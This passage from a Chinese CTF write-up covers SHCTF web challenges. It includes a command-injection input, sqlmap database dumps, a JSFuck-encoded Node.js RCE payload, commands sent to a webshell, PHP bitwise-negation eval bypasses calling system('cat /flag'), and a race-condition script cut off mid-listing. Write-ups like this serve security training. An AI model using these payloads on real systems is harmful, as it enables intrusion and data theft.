127.0.0.1&&nl \/fl?g<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{56f291d6-0fbf-4b30-a79d-6d1c805e8e44}<\/code><\/pre>\n\n\n\n
\u4e0a\u53e4\u9057\u8ff9\u6863\u6848\u9986<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SQL\u6ce8\u5165\u6f0f\u6d1e<\/p>\n\n\n\n
sqlmap\u8dd1<\/p>\n\n\n\n
\u786e\u8ba4 id<\/code> \u53c2\u6570\u662f\u5426\u5b58\u5728\u6ce8\u5165\u6f0f\u6d1e\uff0c\u5e76\u63a2\u6d4b\u6570\u636e\u5e93\u7c7b\u578b\u3002<\/p>\n\n\n\n
sqlmap -u \"http:\/\/challenge.shc.tf:31316\/?id=1\" --batch<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5b58\u5728\u6f0f\u6d1e<\/p>\n\n\n\n
\u83b7\u53d6\u6570\u636e\u5e93\u540d\u79f0<\/p>\n\n\n\n
sqlmap -u \"http:\/\/challenge.shc.tf:31316\/?id=1\" --dbs<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u770bctftraining<\/code> \u5e93\uff1a<\/p>\n\n\n\n
sqlmap -u \"http:\/\/challenge.shc.tf:31316\/?id=1\" -D ctftraining --tables --batch<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u5c06 ctftraining<\/code> \u6570\u636e\u5e93\u4e2d FLAG_TABLE<\/code> \u8868\u7684\u6570\u636e Dump<\/strong> \u51fa\u6765<\/p>\n\n\n\n
sqlmap -u \"http:\/\/challenge.shc.tf:31316\/?id=1\" -D ctftraining -T FLAG_TABLE --dump --batch<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5047\u7684<\/p>\n\n\n\n
\u8dd1\u4e4b\u524d\u53d1\u73b0\u7684\u90a3\u4e2a archive_db<\/code><\/strong> \u6570\u636e\u5e93\uff1a<\/p>\n\n\n\n
sqlmap -u \"http:\/\/challenge.shc.tf:31316\/?id=1\" -D archive_db --dump --batch<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{f2ba0ceb-1e4f-48eb-a40d-8829da428f02}<\/code><\/pre>\n\n\n\n
calc?js?fuck!<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9875\u9762\u662f\u4e00\u4e2a\u8ba1\u7b97\u5668<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n
\u6f0f\u6d1e\u70b9<\/strong>\uff1a\u540e\u7aef\u4ee3\u7801\u76f4\u63a5\u4f7f\u7528\u4e86 eval(operator)<\/code> \u6267\u884c\u7528\u6237\u8f93\u5165\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9650\u5236 (WAF)\uff1a\u6b63\u5219 \/^[012345679!.-+*\/()[]]+$\/ \u9650\u5236\u4e86\u8f93\u5165\u5b57\u7b26\u3002\n\u7981\u7528\u4e86\u5b57\u6bcd\u3001\u5f15\u53f7\u3001\u5927\u62ec\u53f7\u7b49\u3002\n\u5141\u8bb8\u4e86 []()!+\uff0c\u8fd9\u6b63\u662f JSFuck \u8bed\u8a00\u7684\u6838\u5fc3\u5b57\u7b26\u96c6\u3002\n\u73af\u5883\uff1aNode.js (Express)\u3002<\/code><\/pre>\n\n\n\n
\u7ed5\u8fc7<\/p>\n\n\n\n
JSFuck \u7f16\u7801\uff1a\u5229\u7528 JSFuck \u5c06\u4efb\u610f JavaScript \u4ee3\u7801\u8f6c\u6362\u4e3a\u7b26\u5408 WAF \u8981\u6c42\u7684\u7b26\u53f7\u7ec4\u5408\u3002\n\n\u4f5c\u7528\u57df\u9650\u5236 (require \u62a5\u9519)\uff1a\n\u76f4\u63a5\u4f7f\u7528 require \u4f1a\u62a5\u9519 ReferenceError: require is not defined\uff0c\u56e0\u4e3a JSFuck \u7684 Eval Source \u6a21\u5f0f\u662f\u5728\u5168\u5c40\u4f5c\u7528\u57df\u4e0b\u6267\u884c\uff0c\u65e0\u6cd5\u8bbf\u95ee\u6a21\u5757\u79c1\u6709\u7684 require\u3002\n\n\u7ed5\u8fc7\u65b9\u6848\uff1a\u4f7f\u7528 Node.js \u7684\u5168\u5c40\u5bf9\u8c61 process\uff0c\u901a\u8fc7 process.mainModule.require \u6765\u5f15\u5165\u6a21\u5757\u3002<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u8bfb\u53d6 \/flag<\/code> \u5e76\u8fd4\u56de\u7ed3\u679c\u3002<\/p>\n\n\n\n
return process.mainModule.require('child_process').execSync('cat \/flag').toString()<\/code><\/pre>\n\n\n\n
JSFuck \u7f16\u7801<\/p>\n\n\n\n
\u8f6c\u6362\u5c31\u884cJSFuck – Write any JavaScript with 6 Characters: []()!+<\/a><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u624b\u52a8\u89e3\u5c31\u662f\u8fd9\u4e2a\u6837<\/p>\n\n\n\n
\u4f7f\u7528 Postman \u6216 Python \u53d1\u9001\u4e00\u4e2a POST \u8bf7\u6c42\u5230 http:\/\/challenge.shc.tf:31395\/calc\u3002\n\nHeader: Content-Type: application\/json\n\nBody: {\"expr\": \"\u5b57\u7b26\u4e32\"}<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\n\nurl = \"http:\/\/challenge.shc.tf:31395\/calc\"\nwith open('payload.txt', 'r') as f:\n    payload = f.read().strip()\n\nres = requests.post(url, json={\"expr\": payload})\nprint(res.json())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{46c8c4c3-8c8a-4c15-958a-3e9adf9379f6}<\/code><\/pre>\n\n\n\n
05_em_v_CFK<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u6e90\u7801\uff0c\u6709\u63d0\u793a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
5bvE5YvX5Ylt5YdT5Yvdp2uyoTjhpTujYPQyhXoxhVcmnT935L+P5cJjM2I05oPC5cvB55dR5Mlw6LTK54zc5MPa<\/code><\/pre>\n\n\n\n
\u5148rot13\u5728base64\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6211\u4e0a\u4f20\u4e86\u4e2ashell.php, \u5e26\u4e0ashow\u53c2\u6570get\u5c0f\u660e\u7684\u5723\u9057\u7269\u5427<\/code><\/pre>\n\n\n\n
\u8bbf\u95ee\u5c31\u884c<\/p>\n\n\n\n
http://xxx.xx.xx:xxxxx\/uploads\/shell.php?show<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u540e\u95e8\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8ba4\u8bc1\u5bc6\u7801\uff1ac4d038b4bed09fdb1471ef51ec3a32cd<\/code> \u89e3\u5bc6\u4e3a 114514<\/code><\/strong>\u3002<\/p>\n\n\n\n
\u5229\u7528\u65b9\u5f0f\uff1aPOST \u8bf7\u6c42\u53d1\u9001 key=114514<\/code>\uff0c\u914d\u5408 cmd<\/code> (\u7cfb\u7edf\u547d\u4ee4) \u6216 code<\/code> (PHP\u4ee3\u7801) \u53c2\u6570\u3002<\/p>\n\n\n\n
\u62ff\u5230 Shell \u540e\uff0c\u7b2c\u4e00\u4ef6\u4e8b\u662f\u5bfb\u627e Flag \u7684\u4f4d\u7f6e\u3002<\/p>\n\n\n\n
POST \/uploads\/shell.php\nkey=114514&cmd=ls \/\nkey=114514&cmd=find \/ -name \"flag*\"<\/code><\/pre>\n\n\n\n
\u5931\u8d25<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6839\u76ee\u5f55\u4e0b\u65e0 Flag \u6587\u4ef6\uff0c\u5168\u76d8\u641c\u7d22\u4e5f\u65e0\u679c\u3002\u8bf4\u660e flag \u4e0d\u5728\u6587\u4ef6\u7cfb\u7edf\u4e2d\uff0c\u5f88\u53ef\u80fd\u5728\u6570\u636e\u5e93<\/strong>\u91cc\u3002<\/p>\n\n\n\n
\u5f53\u524d\u76ee\u5f55\u7ed3\u6784<\/p>\n\n\n\n
key=114514&cmd=ls ..\/<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bfb\u53d6 index.php \u6e90\u7801<\/p>\n\n\n\n
key=114514&cmd=base64 ..\/index.php<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6838\u5fc3\u903b\u8f91\u5206\u6790\uff1a<\/p>\n\n\n\n
$stmt = $pdo->prepare(\"CALL buy_item(?, ?)\");\n$stmt->execute([$target_id, $my_money]);<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u53d1\u73b0\u4e86\u4e00\u4e2a\u5173\u952e\u7684\u903b\u8f91\u6f0f\u6d1e\uff1a\n\u540e\u7aef\u8c03\u7528\u4e86\u4e00\u4e2a\u540d\u4e3a buy_item \u7684\u5b58\u50a8\u8fc7\u7a0b\u3002\u4f20\u9012\u7684\u53c2\u6570\u662f ($target_id, $my_money)\u3002\u8fd9\u91cc\u7684 $my_money \u662f PHP \u53d8\u91cf\u3002\u867d\u7136\u6b63\u5e38\u7528\u6237\u53ea\u80fd\u662f 3 \u5757\u94b1\uff0c\u4f46\u65e2\u7136\u6211\u4eec\u6709\u4e86 Webshell\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u8c03\u7528\u8fd9\u4e2a\u5b58\u50a8\u8fc7\u7a0b\uff0c\u5e76\u4f20\u5165\u4efb\u610f\u91d1\u989d\u3002<\/code><\/pre>\n\n\n\n
flag \u83b7\u53d6<\/p>\n\n\n\n
\u8c03\u7528 buy_item<\/code> \u5b58\u50a8\u8fc7\u7a0b\uff0c\u4e70\u4e0b ID \u4e3a 3 \u7684 “Golden Flag”\uff08\u4ef7\u683c $50\uff09\u3002<\/p>\n\n\n\n
\u5c1d\u8bd5\u76f4\u63a5\u8bfb\u53d6\u6570\u636e\u5e93\u8868 (\u6743\u9650\u4e0d\u8db3)<\/p>\n\n\n\n
key=114514&code=include('..\/connect.php'); var_dump($pdo->query(\"SELECT * FROM flag\")->fetchAll());<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8c03\u7528\u5b58\u50a8\u8fc7\u7a0b (\u6570\u503c\u6ea2\u51fa\u62a5\u9519)<\/p>\n\n\n\n
key=114514&code=include('..\/connect.php'); var_dump($pdo->query(\"CALL buy_item(3, 999999999)\")->fetchAll());<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62a5\u9519 Numeric value out of range<\/code>\u3002\u8bf4\u660e\u6570\u636e\u5e93\u5b57\u6bb5\u5b58\u4e0d\u4e0b\u8fd9\u4e48\u5927\u7684\u6570\u5b57\u3002<\/p>\n\n\n\n
\u6700\u7ec8 Payload<\/p>\n\n\n\n
\u65e2\u7136\u5546\u54c1\u53ea\u9700 $50\uff0c\u6211\u4eec\u4f20\u5165 $50 \u5373\u53ef\u901a\u8fc7\u68c0\u67e5\u3002<\/p>\n\n\n\n
key=114514&code=include('..\/connect.php');var_dump($pdo->query(\"CALL buy_item(3, 50)\")->fetchAll());<\/code><\/pre>\n\n\n\n
\u539f\u7406\uff1a\ninclude('..\/connect.php');\uff1a\u5229\u7528\u73b0\u6210\u7684\u6587\u4ef6\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\u5bf9\u8c61 $pdo\uff0c\u65e0\u9700\u77e5\u9053\u6570\u636e\u5e93\u5bc6\u7801\u3002\nCALL buy_item(3, 50)\uff1a\u624b\u52a8\u8c03\u7528\u5b58\u50a8\u8fc7\u7a0b\uff0c\u8d2d\u4e70 ID 3 \u7684\u5546\u54c1\uff0c\u5e76\u6b3a\u9a97\u6570\u636e\u5e93\u8bf4\u6211\u6709 50 \u5757\u94b1\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{ef7b6eba-f0c7-4b8c-b491-d542ffd79471}<\/code><\/pre>\n\n\n\n
kill_king<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u524d\u7aef\u903b\u8f91\u5206\u6790\u4e0e\u7ed5\u8fc7<\/p>\n\n\n\n
\u4ee3\u7801\u5ba1\u8ba1<\/p>\n\n\n\n
\u6253\u5f00\u9898\u76ee\u540e\u662f\u4e00\u4e2a\u70b9\u51fb\u6e38\u620f\u3002\u901a\u8fc7\u67e5\u770b\u7f51\u9875\u6e90\u7801\uff08\u6216 F12 \u67e5\u770b logic.js<\/code>\uff09\uff0c\u6211\u4eec\u5173\u6ce8\u6e38\u620f\u83b7\u80dc\u540e\u7684\u903b\u8f91\u5904\u7406\u3002<\/p>\n\n\n\n
\u5728 logic.js<\/code> \u4e2d\u627e\u5230\u6838\u5fc3\u6218\u6597\u51fd\u6570 punch()<\/code>\uff0c\u5176\u4e2d\u5305\u542b\u5982\u4e0b\u4ee3\u7801\u6bb5\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
if (_this.boss) {\n    _this.gamewin = true;\n\n    \/\/ \u5173\u952e\u70b9\u5728\u8fd9\u91cc\n    fetch('check.php', {\n        method: 'POST',\n        headers: { 'Content-Type': 'application\/x-www-form-urlencoded' },\n        body: 'result=win'\n    })\n    \/\/ ...\n}<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n
\u8fd9\u91cc\u7684\u6f0f\u6d1e\u5c5e\u4e8e\u5178\u578b\u7684 Client-Side Trust\uff08\u5ba2\u6237\u7aef\u4fe1\u4efb\uff09 \u95ee\u9898\u3002 \u670d\u52a1\u5668\u7aef\u6587\u4ef6 check.php \u4f3c\u4e4e\u5b8c\u5168\u4fe1\u4efb\u524d\u7aef\u53d1\u9001\u7684\u6570\u636e\u3002\u5b83\u5e76\u6ca1\u6709\u6821\u9a8c\u73a9\u5bb6\u662f\u5426\u771f\u7684\u51fb\u8d25\u4e86 Boss\u3001\u653b\u51fb\u529b\u6570\u503c\u662f\u5426\u5408\u6cd5\u6216\u6e38\u620f\u65f6\u957f\u662f\u5426\u5408\u7406\uff0c\u5b83\u4ec5\u4ec5\u662f\u5224\u65ad\u5b83\u662f\u5426\u6536\u5230\u4e86 result=win \u7684 POST \u8bf7\u6c42\u3002<\/code><\/pre>\n\n\n\n
\u83b7\u53d6\u6e90\u7801<\/p>\n\n\n\n
\u6211\u4eec\u4e0d\u9700\u8981\u771f\u6b63\u53bb\u73a9\u6e38\u620f\uff0c\u76f4\u63a5\u5728\u6d4f\u89c8\u5668\u7684\u63a7\u5236\u53f0\u4e2d\u6a21\u62df\u53d1\u9001\u8fd9\u4e2a\u8bf7\u6c42\u5373\u53ef\u3002<\/p>\n\n\n\n
fetch('check.php', {\n    method: 'POST',\n    headers: { 'Content-Type': 'application\/x-www-form-urlencoded' },\n    body: 'result=win'\n})\n.then(r => r.text())\n.then(console.log);<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e00\u6bb5\u9ad8\u4eae\u7684 PHP \u6e90\u4ee3\u7801<\/p>\n\n\n\n
\u540e\u7aef PHP \u4ee3\u7801\u5ba1\u8ba1<\/p>\n\n\n\n
\u6e90\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n
<?php\n\/\/ ...\nif (isset($_POST['result']) && $_POST['result'] === 'win') {\n    highlight_file(__FILE__);\n\n    \/\/ \u9700\u8981\u4f20\u5165\u4e09\u4e2a GET \u53c2\u6570\n    if(isset($_GET['who']) && isset($_GET['are']) && isset($_GET['you'])){\n        $who = (String)$_GET['who'];\n        $are = (String)$_GET['are'];\n        $you = (String)$_GET['you'];\n\n        \/\/ \u9650\u5236 1: who \u548c are \u5fc5\u987b\u662f\u6570\u5b57\n        if(is_numeric($who) && is_numeric($are)){\n            \/\/ \u9650\u5236 2: you \u5fc5\u987b\u5168\u662f\u201c\u975e\u5355\u8bcd\u5b57\u7b26\u201d\uff08\u4e0d\u80fd\u5305\u542b A-Z, a-z, 0-9, _\uff09\n            if(preg_match('\/^W+$\/', $you)){\n                \/\/ \u6f0f\u6d1e\u70b9: \u62fc\u63a5\u6267\u884c\n                $code =  eval(\"return $who$you$are;\");\n                echo \"$who$you$are = \".$code;\n            }\n        }\n    }\n}\n\/\/ ...\n?><\/code><\/pre>\n\n\n\n
\u9650\u5236\u6761\u4ef6\u5206\u6790<\/p>\n\n\n\n
\u8f93\u5165\u70b9\uff1awho\u3001are\u3001you \u4e09\u4e2a\u53c2\u6570\u3002\n\u6570\u5b57\u9650\u5236\uff1awho \u548c are \u53ea\u80fd\u662f\u6570\u5b57\uff08\u4f8b\u5982 1\uff09\u3002\n\u6b63\u5219\u9650\u5236\uff1apreg_match('\/^W+$\/', $you)\u3002W \u4ee3\u8868\u975e\u5355\u8bcd\u5b57\u7b26\u3002\u8fd9\u610f\u5473\u7740 $you \u53c2\u6570\u4e2d\u4e0d\u80fd\u51fa\u73b0\u4efb\u4f55\u5b57\u6bcd\u3001\u6570\u5b57\u548c\u4e0b\u5212\u7ebf\u3002\n\u6267\u884c\u70b9\uff1aeval(\"return $who$you$are;\");\u3002\u8fd9\u662f\u4e00\u4e2a\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002<\/code><\/pre>\n\n\n\n
\u6784\u9020\u601d\u8def<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u6267\u884c system('cat \/flag')\uff0c\u4f46 system\u3001cat\u3001flag \u90fd\u662f\u5b57\u6bcd\uff0c\u4f1a\u88ab\u6b63\u5219\u62e6\u622a\u3002\n\u4f7f\u7528 PHP \u53d6\u53cd\u7ed5\u8fc7\u6280\u672f\u3002 \u5728 PHP \u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u5bf9\u5b57\u7b26\u4e32\u8fdb\u884c\u6309\u4f4d\u53d6\u53cd\u64cd\u4f5c\u3002\u4f8b\u5982 ~\"system\" \u4f1a\u53d8\u6210\u4e00\u4e32\u4e0d\u53ef\u89c1\u7684\u4e71\u7801\uff08\u9ad8\u4f4d\u5b57\u7b26\uff09\u3002\u8fd9\u4e9b\u4e71\u7801\u4e0d\u5c5e\u4e8e [a-zA-Z0-9_]\uff0c\u56e0\u6b64\u53ef\u4ee5\u7ed5\u8fc7 W \u6b63\u5219\u3002 \u5f53 PHP \u6267\u884c (~\"\u4e71\u7801\") \u65f6\uff0c\u5b83\u4f1a\u8fd8\u539f\u56de \"system\"\u3002<\/code><\/pre>\n\n\n\n
\u670d\u52a1\u5668\u7aef\u7684\u62fc\u63a5\u903b\u8f91\u662f\uff1areturn $who$you$are;\u3002 \u5047\u8bbe\u6211\u4eec\u8bbe\u7f6e $who=1<\/code>, $are=1<\/code>\u3002 \u5982\u679c\u6211\u4eec\u76f4\u63a5\u6784\u9020 $you<\/code> \u4e3a (~\"system\")(~\"ls\")<\/code>\uff0c\u62fc\u63a5\u540e\u7684\u4ee3\u7801\u662f\uff1a<\/p>\n\n\n\n
return 1(~\"system\")(~\"ls\")1;<\/code><\/pre>\n\n\n\n
\u8fd9\u4f1a\u5bfc\u81f4 Parse error<\/strong>\uff08\u8bed\u6cd5\u9519\u8bef\uff09\uff0c\u56e0\u4e3a PHP \u8ba4\u4e3a\u4f60\u8bd5\u56fe\u628a\u6570\u5b57 1<\/code> \u5f53\u4f5c\u51fd\u6570\u540d\u6765\u8c03\u7528\u3002<\/p>\n\n\n\n
\u89e3\u51b3\u65b9\u6cd5\uff1a \u6211\u4eec\u9700\u8981\u5229\u7528\u8fde\u63a5\u7b26 .<\/code>\uff08\u70b9\u53f7\uff09\uff0c\u5c06\u524d\u540e\u8fde\u63a5\u8d77\u6765\u3002name<\/code> \u4e2d\u7684 .<\/code> \u4e5f\u662f\u975e\u5355\u8bcd\u5b57\u7b26\uff0c\u7b26\u5408\u6b63\u5219\u3002 \u6784\u9020\u76ee\u6807\u7ed3\u6784\uff1a<\/p>\n\n\n\n
return 1 . (~\"system\")(~\"ls\") . 1;<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
const payload = \"%20.%20(~%22%8C%86%8C%8B%9A%92%22)(~%22%9C%9E%8B%DF%D0%99%93%9E%98%22)%20.%20\";\nconst url = `check.php?who=1&are=1&you=${payload}`;\n\nfetch(url, {\n  method: 'POST',\n  headers: { 'Content-Type': 'application\/x-www-form-urlencoded' },\n  body: 'result=win'\n})\n.then(response => response.text())\n.then(console.log);<\/code><\/pre>\n\n\n\n
POST \u6570\u636e\uff1a\u643a\u5e26 result=win \u6b3a\u9a97\u670d\u52a1\u5668\u901a\u8fc7\u7b2c\u4e00\u5c42\u6821\u9a8c\u3002\n\u53d6\u53cd\u7f16\u7801\uff1a\u5c06 system \u548c cat \/flag \u8fdb\u884c\u6309\u4f4d\u53d6\u53cd\uff0c\u751f\u6210\u5f62\u5982 %8C%86... \u7684\u7f16\u7801\u3002\nPayload \u62fc\u63a5\uff1a\u6784\u9020 you \u53c2\u6570\uff0c\u5173\u952e\u5728\u4e8e\u524d\u540e\u7684 %20.%20\u3002\u8fd9\u4f7f\u5f97\u540e\u7aef\u7684 eval \u6267\u884c\u7684\u662f return 1 . system(...) . 1;\u3002\nGET \u8bf7\u6c42\uff1a\u5c06 who=1, are=1, \u548c\u6784\u9020\u597d\u7684 you \u62fc\u63a5\u5230 URL \u4e2d\u53d1\u9001\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\n\nurl = \"http:\/\/challenge.shc.tf:31142\/check.php\"\n\ndef encode_bitwise(s):\n    return \"\".join(f\"%{(~ord(c)) & 0xFF:02X}\" for c in s)\n\nfunc = encode_bitwise(\"system\")\ncmd = encode_bitwise(\"cat \/flag\")\n\npayload = f\"%20.%20(~%22{func}%22)(~%22{cmd}%22)%20.%20\"\nquery = f\"who=1&are=1&you={payload}\"\ntarget = f\"{url}?{query}\"\n\ntry:\n    response = requests.post(\n        target, \n        data={\"result\": \"win\"}, \n        headers={\"Content-Type\": \"application\/x-www-form-urlencoded\"}\n    )\n    print(response.text)\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
SHCTF{8eec159f-6e5c-441b-9f0e-2c994e35b3d9}<\/code><\/pre>\n\n\n\n
ez_race<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u7ed9\u7684\u6709\u6e90\u7801<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u672c\u9898\u662f\u4e00\u4e2a\u5178\u578b\u7684 \u6761\u4ef6\u7ade\u4e89<\/strong> \u6f0f\u6d1e\uff0c\u5177\u4f53\u7684\u7c7b\u578b\u4e3a TOCTOU <\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e1a\u52a1\u903b\u8f91<\/p>\n\n\n\n
\u76ee\u6807\uff1a\u8d2d\u4e70 Flag \u9700\u8981 50 \u91d1\u989d\u3002\n\u521d\u59cb\u72b6\u6001\uff1a\u7528\u6237\u91cd\u7f6e\u540e\u91d1\u989d\u4e3a 0\uff08\u867d\u7136 apps.py \u521d\u59cb\u5316\u4e3a 10\uff0c\u4f46 reset_view \u4f1a\u6e05\u96f6\uff09\u3002\n\u9650\u5236\uff1a\u5145\u503c\u529f\u80fd \u6bcf\u6b21\u53ea\u80fd\u5145 10 \u5143\uff0c\u4e14\u9650\u5236\u6bcf\u4e2a\u7528\u6237\u53ea\u80fd\u9886\u53d6\u4e00\u6b21\u201c\u65b0\u4eba\u7ea2\u5305\u201d\u3002<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u70b9\u6e90\u7801\u5206\u6790:\u6f0f\u6d1e\u51fa\u73b0\u5728\u5145\u503c\u68c0\u67e5\u4e0e\u5b9e\u9645\u5165\u8d26\u4e4b\u95f4\u7684\u65f6\u95f4\u5dee\u4e0a\u3002<\/p>\n\n\n\n
\u68c0\u67e5\u9636\u6bb5 (forms.py<\/code>)\uff1a \u5728 clean_amount<\/code> \u65b9\u6cd5\u4e2d\uff0c\u7cfb\u7edf\u68c0\u67e5\u4e86\u7528\u6237\u662f\u5426\u5df2\u7ecf\u5b58\u5728\u5145\u503c\u8bb0\u5f55\u3002<\/p>\n\n\n\n
# forms.py\ndef clean_amount(self):\n    amount = self.cleaned_data[\"amount\"]\n    # \u6f0f\u6d1e\u70b9\uff1a\u5148\u68c0\u67e5\u6570\u636e\u5e93\u4e2d\u662f\u5426\u5b58\u5728\u8bb0\u5f55\n    if models.RechargeLog.objects.filter(user=self.user).exists():\n        raise forms.ValidationError(\"\u5df2\u9886\u53d6\u8fc7\u65b0\u4eba\u7ea2\u5305\")\n    if amount > 10:\n        raise forms.ValidationError(\"\u8d85\u51fa\u7ea2\u5305\u91d1\u989d\u4e0a\u9650\")\n    return amount<\/code><\/pre>\n\n\n\n
\u6267\u884c\u9636\u6bb5 (views.py<\/code>)\uff1a\u53ea\u6709\u901a\u8fc7\u4e86 Form \u9a8c\u8bc1\uff0c\u624d\u4f1a\u8fdb\u5165 form_valid<\/code> \u6267\u884c\u5165\u8d26\u548c\u5199\u5165\u65e5\u5fd7\u7684\u64cd\u4f5c\u3002<\/p>\n\n\n\n
# views.py\ndef form_valid(self, form):\n    amount = form.cleaned_data[\"amount\"]\n    with transaction.atomic():\n        user = models.User.objects.get(pk=self.request.user.pk)\n        user.money = F('money') + amount\n        user.save()\n        # \u5199\u5165\u8bb0\u5f55\u662f\u5728\u8fd9\u91cc\u53d1\u751f\u7684\n        models.RechargeLog.objects.create(user=user, amount=amount)\n    return redirect(self.get_success_url())<\/code><\/pre>\n\n\n\n
\u653b\u51fb\u539f\u7406<\/p>\n\n\n\n
\u7531\u4e8e Django \u7684 FormView \u662f\u5148\u6267\u884c clean (\u9a8c\u8bc1)\uff0c\u9a8c\u8bc1\u901a\u8fc7\u540e\u518d\u6267\u884c form_valid (\u5165\u5e93)\u3002 \u5f53\u6211\u4eec\u4f7f\u7528\u9ad8\u5e76\u53d1\uff08\u591a\u7ebf\u7a0b\uff09\u540c\u65f6\u53d1\u9001\u591a\u4e2a\u5145\u503c\u8bf7\u6c42\u65f6\uff1a\n\u7ebf\u7a0b A \u6267\u884c clean_amount\uff0c\u67e5\u8be2\u6570\u636e\u5e93\u53d1\u73b0\u6ca1\u6709 RechargeLog\uff0c\u9a8c\u8bc1\u901a\u8fc7\u3002\n\u5728\u7ebf\u7a0b A \u5199\u5165\u65e5\u5fd7\u4e4b\u524d\uff0c\u7ebf\u7a0b B \u4e5f\u6267\u884c\u4e86 clean_amount\uff0c\u6b64\u65f6\u6570\u636e\u5e93\u4ecd\u65e0\u8bb0\u5f55\uff0c\u9a8c\u8bc1\u4e5f\u901a\u8fc7\u3002\n\u7ebf\u7a0b A \u548c \u7ebf\u7a0b B \u968f\u540e\u4f9d\u6b21\u8fdb\u5165 form_valid\uff0c\u5206\u522b\u4e3a\u8d26\u6237\u589e\u52a0 10 \u5143\u3002\n\u901a\u8fc7\u63a7\u5236\u5e76\u53d1\uff0c\u6211\u4eec\u53ef\u4ee5\u8ba9 5 \u4e2a\u7ebf\u7a0b\u540c\u65f6\u7a81\u7834\u68c0\u67e5\uff0c\u5c06\u4f59\u989d\u5237\u5230 50 \u5143\uff0c\u4ece\u800c\u8d2d\u4e70 Flag\u3002<\/code><\/pre>\n\n\n\n
\u7ebf\u7a0b\u4e0d\u80fd\u591a \u5426\u5219\u73af\u5883\u76f4\u63a5\u5d29 \u7ebf\u7a0b\u5c11\u4e86\u89e3\u4e0d\u51fa\u4e00\u76f4\u5361\u572840\u5143 \u7136\u540e\u53d1\u73b0\u53ea\u67095\u7ebf\u7a0b\u624d\u53ef\u4ee5<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nimport threading\nimport re\nimport time\n\nBASE_URL = \"http:\/\/challenge.shc.tf:32005\"\nLOGIN_URL = f\"{BASE_URL}\/accounts\/login\/\"\nRECHARGE_URL = f\"{BASE_URL}\/recharge\"\nBUY_FLAG_URL = f\"{BASE_URL}\/buy\/flag\"\nRESET_URL = f\"{BASE_URL}\/reset\"\nSTATUS_URL = f\"{BASE_URL}\/status\"\n\nUSERNAME = \"player@example.com\"\nPASSWORD = \"player\"\nTHREAD_COUNT = 5\n\nsession = requests.Session()\n\nbarrier = threading.Barrier(THREAD_COUNT)\n\ndef get_csrf_token(url):\n    try:\n        resp = session.get(url)\n        match = re.search(r'name=\"csrfmiddlewaretoken\" value=\"(.+?)\"', resp.text)\n        if match:\n            return match.group(1)\n    except Exception as e:\n        pass\n    return None\n\ndef login():\n    print(\"[*] \u6b63\u5728\u767b\u5f55...\")\n    csrf_token = get_csrf_token(LOGIN_URL)\n    if not csrf_token:\n        print(\"[-] CSRF Token \u83b7\u53d6\u5931\u8d25\")\n        return False\n\n    data = {\n        \"csrfmiddlewaretoken\": csrf_token,\n        \"username\": USERNAME,\n        \"password\": 